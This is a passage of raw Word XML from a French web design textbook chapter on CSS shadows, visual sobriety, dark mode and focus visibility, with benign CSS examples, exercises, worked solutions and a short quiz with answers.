              </w:rPr>
              <w:t>Aucune ombre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Carte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="163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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="458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Ombre légère + bordure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Menu déroulant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1639"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4589"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ombre moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Panneau latéral</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="163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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="458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Ombre large + voile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2786"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Boîte de dialogue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1639"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4589"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ombre très large + fond assombri</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne crée pas de profondeur visuelle : il ordonne les couches. Une ombre sans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>z-index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cohérent produit des superpositions incohérentes. Nous traiterons le positionnement au chapitre 20.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Des ombres nommées, cohérentes dans tout le projet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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --ombre-1: 0 1px 2px rgb(15 46 76 / 8%);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --ombre-2: 0 4px 8px rgb(15 46 76 / 10%);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --ombre-3: 0 12px 24px rgb(15 46 76 / 14%);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.carte { box-shadow: var(--ombre-1); }</w:t>
        <w:br/>
        <w:t>.menu  { box-shadow: var(--ombre-2); }</w:t>
        <w:br/>
        <w:t>.dialogue { box-shadow: var(--ombre-3); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>14.4 Effets et sobriété</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les effets attirent l'attention. Multiplication d'ombres, de dégradés, de rayons et de bordures colorées produit une interface bruyante où plus rien ne ressort. La règle est simple : un seul effet dominant par composant.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Une carte : une bordure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ou</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> une ombre, rarement les deux appuyées.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bouton : une couleur pleine, pas de dégradé + ombre + bordure.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titre : une taille forte suffit ; inutile d'ajouter une ombre portée.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état actif : un changement de fond ou de bordure, pas une animation permanente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Avant et après : la sobriété comme choix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Un composant surchargé */</w:t>
        <w:br/>
        <w:t>.bouton {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: linear-gradient(45deg, red, blue);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  box-shadow: 0 10px 30px red, inset 0 0 10px blue;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border: 3px dashed yellow;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  text-shadow: 2px 2px 2px black;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  transform: skew(-5deg);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Un composant lisible */</w:t>
        <w:br/>
        <w:t>.bouton {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: var(--primaire-700);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: #fff;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border: 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: 8px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: .65rem 1.1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  box-shadow: 0 2px 4px rgb(15 46 76 / 18%);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>UNE OMBRE = UNE ÉLÉVATION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Chaque niveau d'ombre doit correspondre à un niveau réel de la hiérarchie. Si deux éléments ont la même ombre, ils sont au même niveau : c'est une information, pas une décoration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>14.5 Mode sombre et contraste élevé</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une ombre noire sur fond noir disparaît. En mode sombre, la profondeur se traduit par des surfaces plus claires et des bordures subtiles, non par des ombres.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>La profondeur en mode sombre, sans ombre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@media (prefers-color-scheme: dark) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  :root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    --surface-0: #0d1620;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    --surface-1: #16222e;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    --surface-2: #1e2c3a;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    --bordure: #2a3b4c;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .carte {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    background: var(--surface-1);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    border: 1px solid var(--bordure);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    box-shadow: none;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Testez toujours vos composants sur les deux thèmes. Un composant qui fonctionne en clair et disparaît en sombre n'est pas « presque terminé » : il est cassé pour une partie des utilisateurs.</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CONTRÔLE DES EFFETS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Chaque ombre correspond-elle à un niveau de hiérarchie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 focus reste-t-il visible sur tous les fonds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Les composants tiennent-ils en mode sombre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 rendu tient-il en niveaux de gris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Aucun effet ne gêne-t-il la lecture du texte ?</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bordure occupe la boîte ; l'outline n'occupe pas d'espace.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focus doit rester visible et contrasté sur tous les fonds.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ombre suggère une élévation : elle doit correspondre à un niveau réel.</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En mode sombre, la profondeur passe par les surfaces, pas par les ombres.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seul effet dominant par composant.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effets se testent en contraste élevé et en niveaux de gris.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les surfaces ont du relief. Le chapitre suivant traite les états et les composants d'interface : boutons, cartes, alertes, navigation.</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14.1 — Construire une échelle d'ombres</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Créez quatre niveaux d'ombre cohérents pour votre projet.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Définissez-les comme variables.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Associez chaque niveau à un composant.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le rendu en mode sombre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 14.2 — Créer un bouton avec tous ses états</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Réalisez un bouton principal avec les états normal, survol, actif, focus et désactivé.</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Conservez un contraste suffisant dans chaque état.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Ne supprimez jamais le focus.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Testez au clavier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 14.3 — Réduire un composant surchargé</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ANALYSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un bouton cumule dégradé, ombre colorée, bordure pointillée, texte ombré et inclinaison.</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Identifiez les effets redondants.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Proposez une version sobre avec un seul accent.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Justifiez chaque suppression.</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14.1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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --ombre-1: 0 1px 2px rgb(15 46 76 / 8%);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --ombre-2: 0 4px 10px rgb(15 46 76 / 10%);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --ombre-3: 0 12px 28px rgb(15 46 76 / 14%);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --ombre-4: 0 24px 60px rgb(15 46 76 / 20%);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>@media (prefers-color-scheme: dark) {</w:t>
        <w:br/>
        <w:t>:root { --ombre-1: none; --ombre-2: none; --ombre-3: none; --ombre-4: none; }</w:t>
        <w:br/>
        <w:t>.carte, .menu, .dialogue { border: 1px solid var(--bordure); background:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    var(--surface-1); }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les quatre niveaux doivent rester perceptiblement distincts : un écart trop faible ne communique aucune hiérarchie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>En mode sombre, remplacer l'ombre par une bordure et une surface plus claire conserve la séparation sans produire de halo noir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 14.2</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.bouton {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --fond: #0f2e4c;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --texte: #ffffff;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: inline-flex;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  align-items: center;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  gap: .5rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: .7rem 1.2rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border: 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: 8px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: var(--fond);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: var(--texte);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font: inherit;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  cursor: pointer;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  transition: background-color .2s ease;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.bouton:hover { background: #274b6d; }</w:t>
        <w:br/>
        <w:t>.bouton:active { transform: translateY(1px); }</w:t>
        <w:br/>
        <w:t>.bouton:focus-visible { outline: 3px solid #e0a21b; outline-offset: 3px; }</w:t>
        <w:br/>
        <w:t>.bouton:disabled { opacity: .55; cursor: not-allowed; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le survol assombrit ou éclaircit d'un cran, sans changer la teinte : l'identité reste stable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Au clavier, le focus ambre est visible sur fond clair comme sur fond sombre ; c'est la raison de sa couleur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 14.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le dégradé et l'ombre colorée portent le même message « important » : l'un des deux suffit. La bordure pointillée suggère un état particulier qui n'existe pas. L'inclinaison gêne la lisibilité du libellé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Version proposée : fond plein, rayon modéré, ombre légère, focus visible. L'attention vient de la couleur, pas du cumul d'effets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque suppression retire du bruit : l'utilisateur identifie plus vite l'action principale.</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Quelle propriété crée un contour qui ne décale pas la mise en page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border</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outline</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box-shadow</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margin</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 signifie une ombre très floue et très décalée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 élément plat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Un élément proche du support</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Un élément élevé au-dessus de la page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Une erreur de rendu</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Comment exprimer la profondeur en mode sombre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Avec des ombres noires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Avec des surfaces plus claires et des bordures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Avec des dégradés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En supprimant les bordures</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Combien d'effets dominants un composant doit-il porter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 seul</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Deux</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Trois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Autant que possible</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 xml:space="preserve">Que risque un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>outline: none</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> non remplacé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 meilleur rendu</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La perte du repère de focus au clavier</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Un décalage de mise en page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Une erreur de validation</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>outline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est dessiné hors du flux : il n'ajoute aucune épaisseur à la boîte, contrairement à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>border</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Plus le flou et le décalage sont grands, plus l'objet paraît éloigné de la surface : l'élévation est perçue comme importante.</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Une ombre noire est invisible sur fond sombre ; l'élévation se traduit par une surface plus claire et une bordure fine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un effet dominant suffit à hiérarchiser ; les cumuls produisent du bruit visuel et brouillent la lecture.</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Sans contour visible, l'utilisateur au clavier ne sait plus où il se trouve dans la page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>15. Composants d'interface et états</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
